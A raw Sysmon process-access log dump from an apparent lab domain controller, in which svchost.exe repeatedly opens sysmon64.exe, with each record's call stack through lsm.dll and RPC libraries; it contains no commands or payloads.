10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.182{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.118{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.